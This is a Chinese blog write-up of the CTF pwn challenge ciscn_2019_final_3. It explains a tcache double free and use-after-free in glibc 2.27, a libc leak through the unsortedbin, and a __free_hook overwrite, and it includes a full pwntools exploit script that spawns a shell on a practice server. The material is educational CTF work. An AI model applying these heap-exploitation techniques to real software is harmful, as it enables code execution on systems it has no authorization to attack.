ciscn_2019_final_3(tcache)

最新推荐文章于 2023-03-18 17:45:35 发布
最新推荐文章于 2023-03-18 17:45:35 发布
阅读量293 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33590156/article/details/119391346
版权

漏洞

本题中限制了chunk的申请大小,最大只能0x78,无法直接申请大于0x400的chunk
free后指针并没有清零,存在uaf
tcache中的chunk被拿出时,不会check size
因为是2.27版本,所以tcache中可以直接进行double free(tcache dup)

tcache,这个东西在2.23之后的版本中出现,释放的chunk会优先放到tcache中,而同一size的tache chunk最多只能7个,之后再释放此size的chunk,会放到fastbin或者unsortedbin中,而放到unsortedbin中的要求是此chunk的size要大于0x400。

利用

题目只有add和free,并且add后会将相应的地址打出来。所以首先得让chunk进入unsortedbin中,来泄露libc基址。

因为最大chunk限制0x78,而free unsortedchunk时,需要下面有chunk垫着防止与top chunk合并,所以,要多申请一些chunk,这里直接申请了0-8的chunk(包括每个chunkheader一共加起来大于0x400),在0中获取了此chunk的地址后,

通过重复释放两次同一chunk,在tcache中形成循环,在申请一次这个大小的chunk,进行写入fd,在申请两次这个大小的chunk,即可实现fd任意地址写。利用这一点,可以将chunk0的size改为0x461(为什么是0x461呢,经过计算,chunk0除去header,加上下面8个chunk,一共0x461,正好到chunk9的header,不这样对齐会报错)

free(0)之后,就会发现进入了unsortedbin中,此时已经出现了main_arena地址,但是我们拿不到 ,这里又涉及到unsortedbin的一个机制,申请的内存在tcache中没有时,如果unsortedbin中有,那会直接从unsortedbin’中切出这一块内存,然后把main_arena的fd和bk,写到切割后的chunk的fd bk中,所以之前申请大片内存时,就要保证chunk0和chunk1的size不同,此时先free(1),chunk1进入了tcache,但他又存在于unsortedbin中,之后再申请一个chunk0size的chunk,就会切割unsortedchunk,将fd bk放入chunk1的fd和bk位,之后连续申请2此chunk1size的chunk,即可泄露main_arena+96的地址。

因为full relro,所以无法修改got表,所以打free_hook,这里有小技巧,可以用main_arena-0x10得到malloc_hook地址,之后减去sym["__malloc_hook"]得到正确的 libc _base,free_hook的地址也这么获得,之后还是dup将free改为system,之后在任意一个chunk上写上/bin/sh,free(4),getshell

from pwn import * 
from LibcSearcher import *
context(os='linux',arch='amd64',log_level='debug')

ms = remote("node3.buuoj.cn",26576)
#ms = process("./ciscn")
libc = ELF("./libc.so.6")

def add(n,size,content):
    ms.sendlineafter('choice > ', '1')
    ms.sendlineafter('input the index\n', str(n))
    ms.sendlineafter('input the size\n', str(size))
    ms.sendlineafter('now you can write something\n', content)
# def edit(n,text):
# 	ms.sendlineafter("Command: ",'2')
# 	ms.sendlineafter("Index: ",str(n))
# 	ms.sendlineafter("Size: ",len(text))
# 	ms.sendafter("Content: ",text)
def free(n):
    ms.sendlineafter('choice > ', '2')
    ms.sendlineafter('input the index\n', str(n))
# def show(n):
# 	ms.sendlineafter("Command: ",'4')
# 	ms.sendlineafter("Index: ",str(n))

add(0,0x70,'a')
ms.recvuntil("gift :")
heap_addr = int(ms.recv(14),16)
log.info("heap_addr="+hex(heap_addr))
#sum
add(1,0x50,'a')
add(2,0x70,'a')
add(3,0x70,'a')
add(4,0x70,"/bin/sh")
add(5,0x70,'a')
add(6,0x70,'a')
add(7,0x70,'a')
add(8,0x70,'a')

add(9,0x10,'a')
add(10,0x70,'a')
add(11,0x30,'a')
#unsortedbin
free(11)
free(11)
add(12,0x30,p64(heap_addr-0x10))#1
add(13,0x30,'a')#1
add(14,0x30,p64(0)+p64(0x461))
free(0)
#leak
free(1)#chunk1 into tcache
add(15,0x70,'a')#size0,cut unsortedbin
add(16,0x50,'a')#size1
add(17,0x50,'a')#size1,main_arena+96
ms.recvuntil("gift :")
main_arena = int(ms.recv(14),16)-96
log.info("main_arena="+hex(main_arena))
libc_base = main_arena-0x10-libc.sym["__malloc_hook"]
log.info("libc_base="+hex(libc_base))
free_hook = libc_base+libc.sym["__free_hook"]
log.info("free_hook="+hex(free_hook))
system = libc_base+libc.sym["system"]
add(18,0x10,'a')
free(18)
free(18)
add(19,0x10,p64(free_hook))
add(20,0x10,'a')
add(21,0x10,p64(system))
free(4)
#malloc_hook = main_arena-0x10
#log.info("malloc_hook="+hex(malloc_hook))


#gdb.attach(ms)
ms.interactive()
Wust-Mo0n5ea丶
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【pwn】 ciscn_2019_final_3
Nothing
12-18 1690
例行检查 保护全开,分析程序。 add函数 只能申请小于0x78大小的chunk,chunk数量不能超过24个,且题目给了申请到内存空间的地址。 free函数 free后指针没有置0,且libc是2.27的,存在tcache dup。唯一问题就在于如何得到libc的地址。泄露libc地址一般通过unsortbin,存在tcache的情况下,64位程序需要申请超过0x400大小chunk,fre...
ciscn_2019_final_3
z1r0的博客
12-29 427
ciscn_2019_final_3 查看保护 uaf。 在add时,会给出data区域的地址,理解为fd就行。 2.27有tcache用unstortdbin来泄露需要有一个size大于0x400的chunk。这里借助double free(dup)和uaf改size。达到条件释放,即可有unstorted bin了。 泄露出libc还是用double free + uaf即可申请到hook。具体2.27下的double free(dup)看z1r0’s blog from pwn import *
【buu刷题】ciscn_2019_final_3
m0_73756460的博客
03-18 337
【buu刷题】ciscn_2019_final_3 write up
[BUUCTF]PWN——ciscn_2019_final_3(tcache dup)
mcmuyanga的博客
03-10 984
ciscn_2019_final_3 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,提示是堆题 64位ida载入 add() remove() 简单的思路:先合并堆块,合并后的堆块大于tcache的范围,然后free掉即可出现libc,接下来就是堆块重叠malloc一个堆块到libc空间,通过gift得到libc地址,接着tcache attack修改__free_hook拿到shell tcache 第一次接触tcache,根据ctfwiki上的知识点简单总结一
heap_exploit_2.31
03-21
2019 TCTF最终版Babyheap2.29 2019 Balsn纯文字 大垃圾箱攻击 tcache dup tcache double free fastbin双免费 botcake的房子 其他堆利用技术与how2heap相同,因此我不编写其他代码-.- pwngdb pwngdb是用于堆...
glibc_ptmalloc_learning
05-15
3. **内存碎片控制**: - 内部碎片:ptmalloc通过bin管理避免内部碎片,同一bin内的内存块大小一致,保证了高利用率。 - 外部碎片:通过大块内存分配(large blocks)和内存合并(coalescing)来减少外部碎片。当...
TCache-开源
04-25
3. **并发控制**:为了支持多线程或分布式环境,TCache很可能提供了线程安全的接口,使用锁或其他并发原语确保数据一致性。 4. **扩展性**:作为一个适合分布式环境的组件,TCache可能支持分片(sharding)和复制,...
Glibc 2.27关于Tcache的增强保护 .pdf
09-05
3. **tcache_put函数的改进**:在旧版本中,tcache_put函数直接将新分配的chunk插入到对应索引的链表中。在2.27版本中,函数在插入前增加了一个检查步骤,确保不会超出预设的最大Tcache计数。这一步骤防止了因无限制...
一个用于学习各种堆利用技术的存储库。-C/C++开发
05-26
教育性堆开发该仓库用于学习各种堆开发技术。 我们在一次hack会议上提出了这个想法,并实现...calc_tcache_idx.c演示glibc的tcache索引计算。 fastbin_dup.c通过滥用fastbin空闲列表,诱使malloc返回已经分配的堆指针。
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
[Buuoj刷题]ciscn_2019_final_3 tcache attack
zylxixixi的博客
10-09 305
Tcache机制的引入 libc2.26以后引入了一个新的机制tcache,类似于fastbin,每条链上允许有7个chunk,多出的chunk会直接放入相应的fastbin或者Unsortedbin,跟以往不同的是,当用户申请chunk时,会优先寻找tcache中的chunk。 因为该机制的引入,提升了处理的速度,但安全性减低了,例如fastbin attach中的double free(tcache dup),free的时候会检查第一个chunk是否为自己,绕过该机制需要构造a->b->
buuoj刷题记录 - ciscn_2019_final_3
qq_34010404的博客
03-25 411
看了大佬们的思路才做出来的,这里只记录一下做题中踩的坑。 1.add函数 2.del函数 free后没有把数组元素标记为0,存在UAF漏洞. 思路是:1.double free 改fd 到 另一个chunk 的首地址处,然后修改chunksize ,原因是程序限制了分配大小为120字节,free到unsorted bin里面。 2.free chunk 到unsorted bin里面 3.double free 修改fd 到第二步中的chunk,之后便可以malloc 到unsorted bin处,然后
[BUUOJ] ciscn_2019_n_3
Joaus的博客
10-06 1782
这里写自定义目录标题漏洞点漏洞利用exp 漏洞点 可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞: 漏洞利用 由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。 我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指...
Pwn-Ciscn_2019_Final
fayinq的博客
03-11 364
Ciscn_2019_Final 感觉是一道很好的堆题,使用了很多技巧以及做题思路,包括了uaf,_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析: main函数: init函数: 沙箱:(少截取一点为无所谓) allocate函数: 这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数: ​ del有一段特殊判定,就是bool的判定,因为bool的存在,导致了没有办法连续释放i
ciscn_final_3
seaaseesa的博客
04-09 338
ciscn_final_3 程序给的glibc版本为2.27,存在tcache机制 首先检查一下程序的保护机制 然后,我们用IDA分析一下 Delete功能存在UAF漏洞 程序没有show的功能,但是add时,会显示堆的地址。 为了能够泄露出glibc地址,我们就要依靠这个add时打印的堆地址。我们只要让tcache bin和unsorted bin重合,那么就能通过申请,...
[V&N2020 公开赛]easyTHeap + ciscn_2019_final_3 ——heap中tcache的一些简单利用方法
PLpa的博客
06-06 1068
在libc2.26之后的libc版本中加入了新的存储结构tcache,这使得我们利用堆的时候要特别注意libc版本。 对tcache不是很了解建议看看CTFWiKi 1.[V&N2020 公开赛]easyTHeap 保护全开,libc2.27版本,进入IDA 看到程序有增删改查的功能。 我们一个个来看: add: 我们可以看到add中不能写入数据。 edit: add中不能读入的数据由edit来读入。 show: 没什么特殊的,就是输出数据,这里我们可以用其来查看我们泄露的地址。 dele
ciscn2019部分writeup
Sea_Sand息禅
06-06 1289
Web 1、JustSoso 拿到源码 打开靶机,查看源码得到提示: 一看就是文件读取,然后就文件读取走一波。 file=php://filter/read=convert.base64-encode/resource=hint.php base64解码拿到hint.php的源码: <?php class Handle{ private $handle; ...
BUUCTF-PWN刷题记录-5(Tcache
weixin_44145820的博客
04-13 1317
目录ciscn_2019_final_3[V&N2020 公开赛]easyTHeap ciscn_2019_final_3 只有添加和删除两个功能 限制了申请的大小,最大为0x78,意味着chunk最大为0x80,添加完可以泄露堆上的地址 free之后没有置空,可以double free 题目分析差不多就这样,下面是漏洞利用: 先申请一个大小为0x78的heap[0],记录下返回地...
linux下gdb最终显示tcache_get错误,会是什么原因?
最新发布
07-13
当使用GDB调试程序时,如果最终显示 "tcache_get" 错误,可能是由于以下原因之一: 1. 未正确安装或配置glibc:GDB 是基于 glibc 的调试工具,如果 glibc 未正确安装或配置,可能会导致 tcache_get 错误。请确保正确安装了 glibc 并设置了正确的库路径。 2. 调试的程序发生了内存错误:tcache_get 错误可能是由于调试的程序发生了内存错误引起的。例如,使用未初始化的指针、越界访问数组、释放已释放的内存等。在执行 GDB 调试时,它可能会捕捉到这些错误并显示 tcache_get 错误。 3. GDB 版本或配置问题:某些 GDB 版本或配置可能会导致 tcache_get 错误的显示。尝试更新 GDB 版本或检查 GDB 的配置以解决问题。 4. 其他问题:tcache_get 错误还可能是由于其他问题引起的,如硬件故障、操作系统问题等。在排除以上问题后,您可以尝试重新启动计算机或更换硬件以解决问题。 要更详细地确定 tcache_get 错误的具体原因,您可以提供更多关于错误的上下文信息、调试过程和相关代码片段,以便更好地进行分析和排查。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值